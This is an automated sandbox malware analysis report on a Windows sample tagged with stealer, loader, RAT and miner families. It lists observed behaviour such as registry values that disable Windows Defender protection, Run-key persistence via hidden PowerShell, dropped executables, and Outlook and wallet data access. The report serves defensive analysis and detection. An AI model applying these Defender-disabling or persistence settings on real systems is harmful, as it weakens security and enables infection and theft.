Malware Analysis Report

2025-06-16 01:29

Sample ID 231031-dtjjvagc4t
Target e0704e6a0706dd6f5a5cee23e9ed3724.bin
SHA256 36ad3a6286f68da08ff4f79ab94a02e958ce3f154f59a9abf311776ac46f3a79
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

36ad3a6286f68da08ff4f79ab94a02e958ce3f154f59a9abf311776ac46f3a79

Threat Level: Known bad

The file e0704e6a0706dd6f5a5cee23e9ed3724.bin was found to be: Known bad.

Malicious Activity Summary

Glupteba

Modifies Windows Defender Real-time Protection settings

Raccoon

Amadey

Detect ZGRat V1

DcRat

SmokeLoader

RedLine payload

RedLine

SectopRAT payload

Raccoon Stealer payload

Glupteba payload

ZGRat

xmrig

SectopRAT

XMRig Miner payload

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

UPX packed file

Executes dropped EXE

Windows security modification

Looks up external IP address via web service

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Adds Run key to start application

Drops file in System32 directory

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

outlook_win_path

outlook_office_path

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:17

Reported

2023-10-31 03:20

Platform

win10v2004-20231025-en

Max time kernel

75s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FDD0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CF47.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D10E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FDD0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\113A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\163D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2003.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3.exe'\"" C:\Users\Admin\AppData\Local\Temp\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-8UR57.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-TCE6D.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-H257L.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-HQQTR.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-TAQME.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-8D3NL.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-VOOS0.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-9U019.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-PEDIT.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-J7265.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-GEK9J.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-8AO40.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-EIEE6.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-ME1IE.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-0RKCO.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
